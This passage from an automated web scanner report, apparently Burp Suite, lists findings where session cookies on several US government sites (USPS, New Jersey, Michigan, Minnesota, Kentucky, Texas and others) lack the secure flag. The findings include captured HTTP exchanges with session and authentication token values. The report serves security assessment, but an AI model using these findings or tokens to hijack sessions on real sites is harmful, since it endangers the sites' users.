<html xmlns="http://www.w3.org/1999/xhtml" lang="en-US" xml:lang="en-US"><head><script language="JavaScript" type="text/JavaScript">
<!--
function setFocus() {
document.getElementById("SSN").focus()
...[SNIP]...

7.35. https://moversguide.usps.com/icoa/flow.do  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://moversguide.usps.com
Path:   /icoa/flow.do

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /icoa/flow.do HTTP/1.1
Host: moversguide.usps.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 12:23:20 GMT
Server: IBM_HTTP_Server
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Content-Length: 9281
Set-Cookie: JSESSIONID=00007vT2kFY8XM1A5vHT9odUlIA:137elttnv; Path=/
Keep-Alive: timeout=10, max=3
Connection: Keep-Alive
Content-Type: text/html;charset=UTF-8
Content-Language: en
Set-Cookie: NSC_fbh-nh-qspe-xfc-443=ffffffff3b2217ab45525d5f4f58455e445a4a4212d3;Version=1;path=/;secure;httponly


<?xml version="1.0" encoding="UTF-8" ?>


<html>
<head>
<meta name="title" content="USPS - MoversGuide">
<meta name="author" content="USPS, Imagitas.">

...[SNIP]...

7.36. https://nhlicenses.nh.gov/MyLicense%20Verification/Search.aspx  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://nhlicenses.nh.gov
Path:   /MyLicense%20Verification/Search.aspx

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /MyLicense%20Verification/Search.aspx?facility=Y HTTP/1.1
Host: nhlicenses.nh.gov
Connection: keep-alive
Referer: http://nhlicenses.nh.gov/home/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 29 Apr 2011 22:40:28 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 18456
Set-Cookie: ASP.NET_SessionId=tcao3k454kf42v45gtkigvjl; path=/
Keep-Alive: timeout=3, max=100
Connection: Keep-Alive


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
<html>
   <head>
       <link rel="stylesheet" href="stylesheets/elicense2000.css">
           <title>Search</title>
   </head>
   <body>
   </body>
...[SNIP]...

7.37. https://njmvcscheduling.state.nj.us/tc/driverlogin.do  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://njmvcscheduling.state.nj.us
Path:   /tc/driverlogin.do

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /tc/driverlogin.do HTTP/1.1
Host: njmvcscheduling.state.nj.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 500 Internal Server Error
Date: Sat, 30 Apr 2011 12:23:49 GMT
Server: Apache/2.0.59 (Unix) mod_ssl/2.0.59 OpenSSL/0.9.8e
Set-Cookie: JSESSIONID=0000g2fKkgZ8he6Dg09OilhxQLU:-1;Path=/
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-control: no-cache
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US

Error 500: Cannot find bean business_UserContext in scope session

7.38. https://onestop.michigan.gov/OneStop/ssoNeedPassword.do  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://onestop.michigan.gov
Path:   /OneStop/ssoNeedPassword.do

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /OneStop/ssoNeedPassword.do HTTP/1.1
Host: onestop.michigan.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 400 Bad Request
connection: close
content-language: en-US
content-type: text/html;charset=ISO-8859-1
date: Sat, 30 Apr 2011 12:24:37 GMT
p3p: CP="NON CUR OTPi OUR NOR UNI"
server: IBM_HTTP_Server
$wsep:
cache-control: no-cache="set-cookie, set-cookie2"
expires: Thu, 01 Dec 1994 16:00:00 GMT
Set-Cookie: AMWEBJCT!%2Fonestop-main!JSESSIONID=00013JITAtVTC4WOI90ULiuLFTx:-2MD9B7; Path=/

Error 400: Request[/ssoNeedPassword] does not contain handler parameter named dispatchCommand
<SCRIPT language="JavaScript">
<!--
document.cookie = "IV_JCT=%2Fonestop-main; path=/";
//-->
</SCRIPT>

7.39. https://onestop.michigan.gov/onestop-main/OneStop/ssoRegistration.do  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://onestop.michigan.gov
Path:   /onestop-main/OneStop/ssoRegistration.do

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /onestop-main/OneStop/ssoRegistration.do HTTP/1.1
Host: onestop.michigan.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 400 Bad Request
connection: close
content-language: en-US
content-type: text/html;charset=ISO-8859-1
date: Sat, 30 Apr 2011 12:24:37 GMT
p3p: CP="NON CUR OTPi OUR NOR UNI"
server: IBM_HTTP_Server
$wsep:
cache-control: no-cache="set-cookie, set-cookie2"
expires: Thu, 01 Dec 1994 16:00:00 GMT
Set-Cookie: AMWEBJCT!%2Fonestop-main!JSESSIONID=0001JbnVVmiOgauTlQhwEaf183v:-2MD9B7; Path=/

Error 400: Request[/ssoRegistration] does not contain handler parameter named dispatchCommand
<SCRIPT language="JavaScript">
<!--
document.cookie = "IV_JCT=%2Fonestop-main; path=/";
//-->
</SCRIPT>

7.40. https://portal.s4web.state.mn.us/psp/por91ssap/SELFSERVICE/ENTP/  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://portal.s4web.state.mn.us
Path:   /psp/por91ssap/SELFSERVICE/ENTP/

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /psp/por91ssap/SELFSERVICE/ENTP/ HTTP/1.1
Host: portal.s4web.state.mn.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PS_LOGINLIST=https://portal.s4web.state.mn.us/por91ssap; web2-80-PORTAL-PSJSESSIONID=K4yZN7vCLYHmSmZ61lt95PGKpxvt51Zd!-1405169941; https%3a%2f%2fportal.s4web.state.mn.us%2fpsp%2fpor91ssap%2fselfservice%2fentp%2frefresh=list:||; __utmz=205212754.1304161967.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PS_TOKENEXPIRE=30_Apr_2011_11:15:39_GMT; BIGipServerprodss-SWIFT_https=520792256.35867.0000; SignOnDefault=; __utma=205212754.145768528.1304161967.1304161967.1304161967.1; ExpirePage=https://portal.s4web.state.mn.us/psp/por91ssap/; __utmc=205212754; __utmb=205212754; PS_TOKEN=pwAAAAQDAgEBAAAAvAIAAAAAAAAsAAAABABTaGRyAk4AcQg4AC4AMQAwABRoxgm+6pefEQHwP4IRzFA21F6QGmcAAAAFAFNkYXRhW3icHYpLCoAwDAXHKi7Fi1T81M9WsLpShAouPYP383A+mpAZ8pIXyFKTJPJniFUGPDszjpObhdxzsFGcBFYuHuW6ttQ0ais7sZNtzCpNHzmIA5O2jlFf/KlQC+o=;

Response

HTTP/1.1 302 Moved Temporarily
Cache-Control: no-cache
Connection: close
Date: Sat, 30 Apr 2011 12:24:44 GMT
Location: https://portal.s4web.state.mn.us/psp/por91ssap/SELFSERVICE/ENTP/h/?tab=MN_GUEST
Content-Type: text/html
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Set-Cookie: web2-80-PORTAL-PSJSESSIONID=qYLRN71M4CpRL303GMjfv1kRpvmQvDhQ!-1405169941; path=/; HttpOnly=
Set-Cookie: https%3a%2f%2fportal.s4web.state.mn.us%2fpsp%2fpor91ssap%2fselfservice%2fentp%2frefresh=list:|||%3ftab%3dmn_guest; domain=.state.mn.us; expires=Saturday, 30-Apr-2011 12:44:44 GMT; path=/; secure
Set-Cookie: PS_TOKENEXPIRE=30_Apr_2011_12:24:44_GMT; domain=.state.mn.us; path=/; secure
Set-Cookie: SignOnDefault=; domain=.state.mn.us; path=/; secure
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Length: 353

<html><head><title>302 Moved Temporarily</title></head>
<body bgcolor="#FFFFFF">
<p>This document you requested has moved temporarily.</p>
<p>It's now at <a href="https://portal.s4web.state.mn.us/p
...[SNIP]...

7.41. https://portal.s4web.state.mn.us/psp/por91ssap/SELFSERVICE/ENTP/h/  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://portal.s4web.state.mn.us
Path:   /psp/por91ssap/SELFSERVICE/ENTP/h/

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /psp/por91ssap/SELFSERVICE/ENTP/h/?tab=MN_GUEST& HTTP/1.1
Host: portal.s4web.state.mn.us
Connection: keep-alive
Referer: http://www.state.mn.us/portal/mn/jsp/home.do?agency=NorthStar
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=205212754.145768528.1304161967.1304161967.1304161967.1; __utmb=205212754; __utmc=205212754; __utmz=205212754.1304161967.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); web2-80-PORTAL-PSJSESSIONID=FRMYN7vQyWCl2GvSTnjKccNL4TyQstPG!-1405169941; BIGipServerprodss-SWIFT_https=520792256.35867.0000

Response

HTTP/1.1 302 Moved Temporarily
Cache-Control: no-cache
Cache-Control: no-store
Connection: close
Date: Sat, 30 Apr 2011 11:17:50 GMT
Location: https://portal.s4web.state.mn.us/psp/por91ssap/SELFSERVICE/ENTP/h/?tab=MN_GUEST
Content-Type: text/html
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Set-Cookie: web2-80-PORTAL-PSJSESSIONID=F2dNN7vpBYLspdSKYyfMGvL3QlThTrNg!-1405169941; path=/; HttpOnly=
Set-Cookie: https%3a%2f%2fportal.s4web.state.mn.us%2fpsp%2fpor91ssap%2fselfservice%2fentp%2frefresh=list: %3ftab%3dmn_guest; domain=.state.mn.us; expires=Saturday, 30-Apr-2011 11:37:50 GMT; path=/; secure
Set-Cookie: ExpirePage=https://portal.s4web.state.mn.us/psp/por91ssap/; domain=.state.mn.us; path=/; secure
Set-Cookie: PS_LOGINLIST=https://portal.s4web.state.mn.us/por91ssap; domain=.state.mn.us; path=/; secure
Set-Cookie: PS_TOKENEXPIRE=30_Apr_2011_11:17:50_GMT; domain=.state.mn.us; path=/; secure
Set-Cookie: PS_TOKEN=pgAAAAQDAgEBAAAAvAIAAAAAAAAsAAAABABTaGRyAk4AcQg4AC4AMQAwABQCDU5YTa3H7AOgmr8ND8Tx8IqdoWYAAAAFAFNkYXRhWnicHYlJCoAwEATLBY/iRyIajXoVXE5KIIJH3+D/fJxNZpiqofsF8ixNEvlLiVMFVg5mejw3C8XKyU7pCWxcPMrVWhparZF7sZNNzGrdKDqsODDpc5H8qZwL8A==; domain=.state.mn.us; path=/; secure
Set-Cookie: SignOnDefault=; domain=.state.mn.us; path=/; secure
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Length: 353

<html><head><title>302 Moved Temporarily</title></head>
<body bgcolor="#FFFFFF">
<p>This document you requested has moved temporarily.</p>
<p>It's now at <a href="https://portal.s4web.state.mn.us/p
...[SNIP]...

7.42. https://portal.s4web.state.mn.us/psp/por91ssap/SELFSERVICE/ENTP/h/  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://portal.s4web.state.mn.us
Path:   /psp/por91ssap/SELFSERVICE/ENTP/h/

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /psp/por91ssap/SELFSERVICE/ENTP/h/?tab=MN_GUEST HTTP/1.1
Host: portal.s4web.state.mn.us
Connection: keep-alive
Referer: http://www.state.mn.us/portal/mn/jsp/home.do?agency=NorthStar
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=205212754.145768528.1304161967.1304161967.1304161967.1; __utmb=205212754; __utmc=205212754; __utmz=205212754.1304161967.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)

Response

HTTP/1.1 302 Moved Temporarily
Cache-Control: no-cache
Cache-Control: no-store
Connection: close
Date: Sat, 30 Apr 2011 11:18:03 GMT
Location: https://portal.s4web.state.mn.us/psp/por91ssap/SELFSERVICE/ENTP/h/?tab=MN_GUEST&
Content-Type: text/html
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Set-Cookie: web3-80-PORTAL-PSJSESSIONID=cr9QN7vL1xm6SKKnWRVmmVfY7kphtMG8!-315906014; path=/; HttpOnly=
X-Powered-By: Servlet/2.5 JSP/2.1
Set-Cookie: BIGipServerprodss-SWIFT_https=537569472.38427.0000; path=/
Content-Length: 363

<html><head><title>302 Moved Temporarily</title></head>
<body bgcolor="#FFFFFF">
<p>This document you requested has moved temporarily.</p>
<p>It's now at <a href="https://portal.s4web.state.mn.us/p
...[SNIP]...

7.43. https://portal.s4web.state.mn.us/psp/por91ssap_newwin/SELFSERVICE/ENTP/e/  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://portal.s4web.state.mn.us
Path:   /psp/por91ssap_newwin/SELFSERVICE/ENTP/e/

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /psp/por91ssap_newwin/SELFSERVICE/ENTP/e/ HTTP/1.1
Host: portal.s4web.state.mn.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PS_LOGINLIST=https://portal.s4web.state.mn.us/por91ssap; web2-80-PORTAL-PSJSESSIONID=K4yZN7vCLYHmSmZ61lt95PGKpxvt51Zd!-1405169941; https%3a%2f%2fportal.s4web.state.mn.us%2fpsp%2fpor91ssap%2fselfservice%2fentp%2frefresh=list:||; __utmz=205212754.1304161967.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PS_TOKENEXPIRE=30_Apr_2011_11:15:39_GMT; BIGipServerprodss-SWIFT_https=520792256.35867.0000; SignOnDefault=; __utma=205212754.145768528.1304161967.1304161967.1304161967.1; ExpirePage=https://portal.s4web.state.mn.us/psp/por91ssap/; __utmc=205212754; __utmb=205212754; PS_TOKEN=pwAAAAQDAgEBAAAAvAIAAAAAAAAsAAAABABTaGRyAk4AcQg4AC4AMQAwABRoxgm+6pefEQHwP4IRzFA21F6QGmcAAAAFAFNkYXRhW3icHYpLCoAwDAXHKi7Fi1T81M9WsLpShAouPYP383A+mpAZ8pIXyFKTJPJniFUGPDszjpObhdxzsFGcBFYuHuW6ttQ0ais7sZNtzCpNHzmIA5O2jlFf/KlQC+o=;

Response

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Sat, 30 Apr 2011 12:24:46 GMT
Location: https://portal.s4web.state.mn.us/psp/por91ssap_1/SELFSERVICE/ENTP/e/
Set-Cookie: web2-80-PORTAL-PSJSESSIONID=B0pNN71TvwpvDZD6l1r189z82CnVrh8y!-1405169941; path=/; HttpOnly=
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Length: 331

<html><head><title>302 Moved Temporarily</title></head>
<body bgcolor="#FFFFFF">
<p>This document you requested has moved temporarily.</p>
<p>It's now at <a href="https://portal.s4web.state.mn.us/p
...[SNIP]...

7.44. https://portal01.state.nj.us/http:/portal20.sa.state.nj.us:8080/amserver/UI/Login  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://portal01.state.nj.us
Path:   /http:/portal20.sa.state.nj.us:8080/amserver/UI/Login

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /http:/portal20.sa.state.nj.us:8080/amserver/UI/Login HTTP/1.1
Host: portal01.state.nj.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 30 Apr 2011 12:24:49 GMT
Content-type: text/html;charset=UTF-8
Cache-control: private
Expires: 0
X-dsameversion: 7 2005Q4 patch 120954-12
Am_client_type: genericHTML
Set-Cookie: %2Fportal20.sa.state.nj.us_JSESSIONID=B1981083223B49AAF8B9D753FAD991EB|portal20.sa.state.nj.us|/|iplanet; domain=.state.nj.us; path=/
Set-Cookie: %2F.state.nj.us_AMAuthCookie=AQIC5wM2LY4Sfcx9UjpVfeUFx19Ud%252FeRI7S2%252FxpJgtc3zKY%253D%2540AAJTSQACMDE%253D%2523|.state.nj.us|/|iplanet; domain=.state.nj.us; path=/
Set-Cookie: %2F.state.nj.us_amlbcookie=01|.state.nj.us|/|iplanet; domain=.state.nj.us; path=/
Content-Length: 6736
Connection: close


<html>


<head>
<title>Log On To myNewJersey</title>


<link rel="stylesheet" href="https://portal01.state.nj.us/http://portal20.sa.state.nj.us:8080/oit/styles/mynj3.css" type="text/css">
<
...[SNIP]...

7.45. https://secure.apps.state.nd.us/dot/mv/mvrenewal/renewal.htm  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://secure.apps.state.nd.us
Path:   /dot/mv/mvrenewal/renewal.htm

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /dot/mv/mvrenewal/renewal.htm HTTP/1.1
Host: secure.apps.state.nd.us
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 11:20:33 GMT
Server: IBM_HTTP_Server
Expires: Sat, 25 Dec 1993 23:59:59 GMT
Pragma: no-cache
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Content-Length: 5917
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Set-Cookie: JSESSIONID=00006ggXFuNilHcrYqmDvIYzvFS:13fea6dft; Path=/
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" lang="en-US" xml:la
...[SNIP]...

7.46. https://secure.kentucky.gov/portal/login.aspx  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://secure.kentucky.gov
Path:   /portal/login.aspx

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /portal/login.aspx HTTP/1.1
Host: secure.kentucky.gov
Connection: keep-alive
Referer: http://kentucky.gov/Pages/home.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=210812687.1304123849.1.1.utmcsr=ky.gov|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=210812687.1043360039.1304123849.1304123849.1304123849.1; __utmc=210812687; __utmb=210812687.2.10.1304123849

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 00:43:53 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=gqjt3255rvivxbzywyvuhdvc; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 24079


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
   <head>
       <title>Kentucky.gov: - Login</title>
<meta http-equiv="Content-Type" content="text/htm
...[SNIP]...

7.47. https://secure.sces.org/PDIC/GatewayServlet  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://secure.sces.org
Path:   /PDIC/GatewayServlet

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /PDIC/GatewayServlet HTTP/1.1
Host: secure.sces.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Sat, 30 Apr 2011 12:28:17 GMT
Server: IBM_HTTP_Server
Location: https://secure.sces.org/PDIC/GatewayServlet?hptAppId=ICFJREG&hptExec=Y
Content-Length: 0
Set-Cookie: JSESSIONID=0000ClCDh49_s9SCRFnwCZw1q60:-1; Path=/
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: no-cache="set-cookie, set-cookie2"
Connection: close
Content-Type: text/plain
Content-Language: en-US


7.48. https://services.georgia.gov/dhr/cspp/do/public/Welcome  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://services.georgia.gov
Path:   /dhr/cspp/do/public/Welcome

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /dhr/cspp/do/public/Welcome HTTP/1.1
Host: services.georgia.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Sat, 30 Apr 2011 12:22:50 GMT
Server: Sun-Java-System/Application-Server
Content-type: text/html;charset=UTF-8
X-powered-by: Servlet/2.4
Pragma: No-cache
Cache-control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
X-powered-by: JSP/2.0
Set-cookie: JSESSIONID=a6618311cdf773ffffffff8fe26605d0e2529; Path=/dhr/cspp
Connection: close


<html>
<body>


<table border="0" cellspacing="0" cellpadding="0">
   <tr>
       <td>
           <body style="background-color:#E2E1C3;">
               <TABLE cellSpacing=0 cellPadding=0 wid
...[SNIP]...

7.49. https://ssl.sc.gov/osmbareportfiling/precerttool.aspx  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://ssl.sc.gov
Path:   /osmbareportfiling/precerttool.aspx

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /osmbareportfiling/precerttool.aspx HTTP/1.1
Host: ssl.sc.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Cache-Control: private
Content-Length: 159
Content-Type: text/html; charset=utf-8
Location: /osmbareportfiling/SessionTimeout.aspx
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=nwj3pq45rx1ztumn3t35xl45; path=/; HttpOnly
Date: Sat, 30 Apr 2011 12:30:49 GMT
Connection: close

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="%2fosmbareportfiling%2fSessionTimeout.aspx">here</a>.</h2>
</body></html>

7.50. https://txapps.texas.gov/tolapp/txdl/welcome.dl  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://txapps.texas.gov
Path:   /tolapp/txdl/welcome.dl

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /tolapp/txdl/welcome.dl HTTP/1.1
Host: txapps.texas.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 12:26:52 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.30 mod_ssl/2.2.17 OpenSSL/1.0.0c
Content-Length: 3757
Set-Cookie: JSESSIONID=bRvLN8QDy0pSHzPd0y9jwDB2VzdxSmwpQPy9fyTfFv5xnvKCCxcJ!1245023878!1608377493; path=/; HttpOnly
Content-Language: en
X-Powered-By: Servlet/2.5 JSP/2.1
Connection: close
Content-Type: text/html; charset=ISO-8859-1

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">



...[SNIP]...

7.51. https://txapps.texas.gov/tolapp/viewandpay  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://txapps.texas.gov
Path:   /tolapp/viewandpay

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /tolapp/viewandpay HTTP/1.1
Host: txapps.texas.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 12:26:53 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.30 mod_ssl/2.2.17 OpenSSL/1.0.0c
Cache-Control: no-cache
Cache-Control: no-cache
Cache-Control: no-store
Content-Length: 5545
Expires: 0
Set-Cookie: JSESSIONID=YhD0N8QD11LQ4mKJSvnyxhrR5SQTfVL0T7T9pw9G8ScBsGwXRDnt!1282520447!-1064935277; path=/; HttpOnly
X-Powered-By: Servlet/2.5 JSP/2.1
Connection: close
Content-Type: text/html; charset=ISO-8859-1


<!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...

7.52. https://unitedalert.com/  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://unitedalert.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: unitedalert.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 12:28:52 GMT
Server: Apache/2.2
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Set-Cookie: PHPSESSID=ceiaqg112uta410c27gi7ihi84; path=/
Set-Cookie: X-Mapping-abiknkkh=3EEB2AE635DD7C372F7D3DF20A0A1F9F; path=/
Connection: close
Content-Length: 8865

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
   <head><title>United Alert: Free Emergency Alert and Group Communication Service, SMS and Email </ti
...[SNIP]...

